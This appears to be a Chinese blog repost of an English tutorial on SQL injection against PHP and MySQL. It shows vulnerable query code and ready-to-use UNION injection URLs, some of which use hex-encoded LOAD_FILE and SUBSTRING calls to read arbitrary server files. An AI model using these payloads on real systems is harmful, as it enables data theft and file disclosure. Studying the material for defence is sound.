對php+mysql的注入攻擊
看看以下的內容
$query ="SELECT *FROM user where user ='".$_REQUEST ['user'] .."'";
...sql injection is impossible.However,if the value is being placed in a non-delimited
portion of the query,such as a numeric value,table or column name:
$query ="SELECT *FROM user order by ".$_REQUEST ['user']; or
$query ="SELECT *FROM user where max_connections =".$_REQUEST ['user'];
...then SQL injection is still possible。
還有一種方式是可以注入的
$query ="SELECT *FROM user where user =($_REQUEST ['user'])
If we want to return other useful data – apart from the ''user'table – we can use the
'UNION'statement to combine two resultsets.Since the 'UNION'statement comes after
the 'WHERE'clause in a select statement,we can choose any data we like,within the
following restrictions:
•Our select statement must return the same number of fields as the original (31 if you
count them,or do a 'describe user').
•The data types of our fields must match,or it must be possible to implicitly convert
between the two
•If our data contains text fields,they will be truncated to the length of the
corresponding text field in the first query
Let's say we want to return the '@@version'string.We would request something like:
http://mysql.example.com/query.php?user=1+union+select+@@version,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
We can select arbitrary fields from tables in other tables using union select.For example,
suppose we wanted to retrieve the 'name'and 'dl'fields from the 'func'table:
http://mysql.example.com/query.php?user=1+union+select+name,dl,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+func
Using 'UNION',an attacker can effectively access all of the data that the calling
application can access.
LOAD_FILE function
The LOAD_FILE function returns a string containing the contents of a file,specified by
it's path.So,for example on a windows box,the query
select load_file('c:/boot.ini');
...will retrieve the contents of the boot.ini file.
Obviously if the target host is running PHP and has magic_quotes turned on,we need to
express the string 'c:/boot.ini'without using single quotes.Fortunately,MySQL accepts
hex-encoded strings as a substitute for string literals.
For example,the following two select statements are equivalent:
select 'c:/boot.ini'
select 0x633a2f626f6f742e696e69
So if we request...
http://mysql.example.com/query.php?user=1+union+select+load_file(0x633a2f626f
6f742e696e69),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
...we get something that looks like:
[boot loader ] timeout==30 default=multi(0)disk(0)rdisk(0)pa 1 1 N N N N N N N N N N N N N N N N N N N N N 1 1 1 1 1 1
In other words,we got the first few bytes of c:/boot.ini,because the 'union'truncates the
string to the length of the first field of the user table – which is 60 characters..
We can address this by using the 'substring'function:
http://mysql.example.com/query.php?user=1+union+select+substring(load_file
(0x633a2f626f6f742e696e69),60),
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
This will select the next 60 characters from 'boot.ini'.In this manner,we can iterate
through the whole file,returning all the data.LOAD_FILE works on binary files,and
SUBSTRING allows you to skip nulls,so the attacker can also use this technique to read
arbitrary binary files.
對php+mysql的注入攻擊
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
以前收集的一些安全文章
linxhome
2018-08-27 09:36:29
使用PHP中破解md5密碼(循環:10萬個/3秒)
linxhome
2018-08-27 09:36:27
SASL - 簡單認證和安全層
水墨风光
2018-08-26 23:44:56
生成自簽名SSL證書
水墨风光
2018-08-26 23:44:56
警告:爲了安全請不要隨意將ASP.Net的validateRequest="false"
dancefire
2018-08-26 21:13:10
非API函數檢測操作系統類型
olncy
2018-08-26 16:01:27
Java 安全性 – 認證與授權
iteye_2386
2018-08-26 06:47:33
中國門戶網站架構分析
henry365
2018-08-26 03:52:47
Security - lessons in Sydney University - 1
格物致知_Morgan
2018-08-25 23:21:43
用QQ文件共享漏洞入侵Win 2003系統
h2j
2018-08-25 21:07:38
透視威力強大的木馬程序開發技術
h2j
2018-08-25 21:07:24
十條nmap常用的掃描命令
stilling2006
2018-08-25 15:59:26
端口掃描程序nmap使用手冊
stilling2006
2018-08-25 15:59:26